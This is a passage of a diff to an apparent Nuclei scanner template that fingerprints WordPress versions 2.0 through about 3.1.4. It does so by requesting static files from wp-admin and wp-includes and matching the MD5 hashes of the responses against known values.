matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b8c332ebadeb17298472c4ba3c009ccf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"f4e3d9071653ae7a841689be7c487333\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f3653960e8f0ae4cdd7804f60c133f81\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"df8848b32f98e52c08a29afca280d753\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/images/box-bg-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"7d5f2df59d28b587f741e4d285941067\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"1f7174c8737cbd04837faf5e384013bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/upload.css" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dbx-admin-key.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link-cat.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"e312e9c4c47464e8484370c1ae680835\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.dimensions.min.js" + matchers: + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"47c86e764c9d5dec1a2929f06cd7464a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/popups.css" + matchers: + - type: dsl + name: 2.1 - 2.5.1 + dsl: + - "(\"b548e47b5fef91f0a2ac405e0d2bde23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/tar.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"f214503adb3d0946bf0f78a6fb815531\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/text.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d64f782215bff7917a77309ddb8ca739\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/doc.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8c7bcb970b8dd6bffdb162e153b148b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/exe.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"c1dd9f17509fb7bf683fd1faf1a60b17\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/zip.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"99fbe6255f4fddf2f85467ed26d38ee8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/video.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d7086fb6dd56f54333b273eca67eee80\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/css.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"33dbb7b35ac859049fadec238f20b6dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/default.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"0dab7bf1ca21c5c0187b8cce6a4beddb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/swf.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"66aaea9de851ee5d375b64a7cb621589\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/pdf.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"65d6fc1f8c488839ed18da9542002271\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/audio.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"a0fe1ae5c188baadbba60db814bdcf2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/js.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"cd985c7f9dc16f22b6a089162f9f9b49\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/html.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"56971a813ffec45a9caac9fa0820ba5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/readme.txt" + matchers: + - type: dsl + name: 2.0 - 2.6.5 + dsl: + - "(\"fe81b122bcf0e8599bb841cca33f967a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_ext.js" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - 
"(\"5e97d9bfadfbaabaa0b26b61c45a400d\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5c90444da969c6153d334429897306b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-fresh.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"15674fa43f78721d5b3ad896dc00aaf1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-classic.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"c2ff7e39c4531f19f7cca9e1c173664f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/tab.png" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"66dc0e9e049f03a553edef7050a25ef7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-buttons.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"61c46617871c3d07bf3e6a82488776fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gear.png" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2e7caff6bd79185a893c8f2d71a2bf85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-pill.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"42b039a8868185213bfa6b5a0c71f563\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-rtl.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"a1a86519bed554d2e9e4af526c642e25\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-gallery.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d2dddcf3d5a7553c246e967d3c149fc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/tail.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"b93de208dc82124aab27a0300cef5816\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-ie.css" + matchers: + - type: dsl + name: 2.6.2 - 2.6.5 + dsl: + - 
"(\"1ffbb45a7cc8a96c335ba18973704905\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.1 + dsl: + - "(\"e9129420be8a404147faf2a2de4fc9e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/upload-rtl.css" + matchers: + - type: dsl + name: 2.3 - 2.6.5 + dsl: + - "(\"c9106b5fd9fa57f1151e8eede647aef1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/upload.js" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"44433c60fe6569e064febe62096bc9a5\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"bca00b7ab1d7a535f30aec6489fa4e1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload_f9.swf" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"8ee900948d38bbcdd1a10c7b3221cce6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.documentready.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"9cbece0f8f4192b636f5484d4ddf63cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.graceful_degradation.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"57901feb399ab92498cbe8ef193bf832\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/blank.css" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"c15c875a4c54efa8554bca63aee6ecb9\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e873e4b2d1c926891df13afca4f73e49\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/pasteword.css" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"2042313f6628ef2b742c74aba0fd9b60\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e1dfc4d39541876eae65975a6febf6cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + 
- "(\"f54e4df3a63237afd7471c95d8484f6e\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"0b28d9f27e1f3c8d817aeb31bcb352af\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"a4394be567c66e0cfb88b32cb6369a85\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"f85d3b49bea0be6fdfb9b0fc8c76140c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/mclayer.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"8885fea7b48a56b5e50e7c7368122f2f\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"70718596a2b1f3dc07b83cf1ca0a22b9\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4572e78780966da5d48445a63ddd226\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/users.js" + matchers: + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0c2b99ed1de562e31325078f398d3189\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d9f70a2fc3218dd1e7dc47d397d37d36\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/slug.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"6856b5d635ea0863e4a0531df329c8ae\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"8d05ddd4fed8e7fc5bd6a9aa254184c2\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"60d61478be0a8c0178fffeefac7c4feb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/slug.dev.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"216b3181cccbf143cef4cae1d09dcb1d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/page.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d8613d8d5318ca18f488428db7e0d97f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"5f4e644bb3e0efe9b40e562cd9662bbd\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - 
"(\"d345cbe714be44a04d926a9e470782c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/page.dev.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d94c023c0c18b0900218f78b9aad9d3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/prototype.js" + matchers: + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/gecko.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c956d369c49985b58dd290d34582219\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/opera.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"f74fa89f8ad2fb9a181a208f10da7b85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/msie.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"f3b838bc550dc9bc558227fafce84533\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"aa0c74b76c8cc60de8737d59cb0e7cdf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/images/line-numbers.png" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"a76c9f4012abdcc34f6a5f7e5a192a8e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/html.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c2c3977b42d65c155c8478d7b6daf51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.js" + matchers: + - 
type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"83dca53adedd600821680a056d250d52\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"02f092e68dc9db24938f5eeb3d5c8567\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/css.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"aa387749d0225b801966586cb3440feb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"dcf899b8e094d6ce00f862ccd29cd757\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/java.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"12bc23938841da78e58634abf6496878\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/java.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"790af578062b6477d836e3fb2a7649c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8d361eab73d9102e860ffefe4e4f8c6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/html.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"fb2ded83464c3fe2f1e5b637040a3a94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"4d5da44c9fa9ecadf7798348216e9ffb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/text.css" + matchers: + - type: dsl + name: 2.8 - 
2.9.2 + dsl: + - "(\"abaac598019c3320c840d668e3e51f29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"73dca79fa86f18c94570e0e1cfc62aae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"d41bb2cf55d7c5c7e47dfe3e4d86db0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"dfb384ec9b7e486a00395c1e770a34f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"91e8cd2f56bca1c8f494b3be0625a0d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/text.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"870cfa7de88e106a459a97e65cbe4663\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/php.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"62832f855a526454f812e8b67ad826e6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/css.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c645111eabe8877ad347cee16e592bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"983220b0ee96cb5b166de574ad989d93\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - 
"(\"271da30b0a22637d4c255abb60644870\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"07599e630b9c2c13da05e32cddc0033e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9c7b6a5314b3cee0810447d6f65156e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8ab6d398feb9e9c1c77525143f05ec74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"0dba07c9dc503965d361f900d3eac5a1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"e971d7976986a2fb16f492975170bb22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2d4b45ac584d7baa65fd044b523161c6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/php.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9b73eec0ab489d7cd832fc01dac0d448\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"e98daf8aeacba58424d112e3f6e593c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9ac88960aa13b291891f128267233040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/license.txt" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"adc05bf63f3776f4f7c2950825b770a9\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.html" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"930e281d2080dfe3e2d1cacedca458d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/interface.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"6bc3151d1902096d20d92f6042f85757\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"6d4f57b9e6ac9be29d676f255f42af5b\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"847407c01f884853efd73974931e2195\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/rtl.dev.css" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f8e96e1e87c798f8163b951a06401179\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browse-happy.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"3bad5ccecc83f7e368c79bc7f961e337\" == md5(body))" + - type: dsl + name: 2.0 - 2.6.5 + dsl: + - "(\"119997784c78f5b652718aa83d91f0d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-top.png" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"6d51aeeb995d529ea74d3339c8fd826b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"797be4dafa9e042735e030df67ec0f26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-left.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"1f4510095793f25a12c376f136429880\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs.gif" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"4a094808ccb90b388ac92611d6e9e365\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-gears.dev.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d97f6085669659c709b6e285ae9ce98a\" == md5(body))" + - type: dsl + name: 2.8 - 
2.8.6 + dsl: + - "(\"56bb1aec2083a149e8b0dbab78eccdf2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/editor_plugin.js" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"9bf27e117e423eea7754fb6e471276ee\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9d7a37a26a6773ae236ed7a75f4617da\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"e22fe4b5a129c551ebbb856f1f3f31e2\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c079c4b2c39f0bc31b4e6350db2ca4aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/blank.htm" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"c9a4909a579f24cd23fc0ae847e06241\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/quicktime.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/shockwave.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/realmedia.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/trans.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flash.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/windowsmedia.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - 
"(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flv_player.swf" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"fe011e9725b2722b59bb8ef4991bf6bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/content.css" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"ebcad73e7f6785a308328129aa90d5cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/blank.htm" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"f3519538055a4d1fdbe39fb84def65a5\" == md5(body))" + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"a35859a0902cbc290d6638823d50df88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-right.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"44b706f5027137aa6d58a6226a4fecdc\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"ae671f7223fff3a47375d47a4bcf587f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-active-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"60f72449e40ee8a8d6bef4e8ed0260fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list-vs.png" + matchers: + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"978f0351d99a761bdafd313e76201be9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"c614f82ed58080d37618cc1839e4ce02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"a80771dd731c047e5dbbee8829163e82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/visit-site-button-grad-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"4fd90308cccfc4fe131b07df35be96d4\" == md5(body))" + - 
method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-vs-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ac1697376f9765b1e8846f0601938243\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/visit-site-button-grad.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"75e555e701dd658659474dfb3a70e851\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-top-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"0b16e5449ce8cd8fc7c7412f385e9edc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-right-up.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"f645b789be33f81da8fdca5aedecc97e\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"745eebb21d33c943adbfea7bc6d37aa4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/fm.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"ac4a63cad5d195d24ec4c91121e9be2f\" == md5(body))" + - method: GET + path: + - 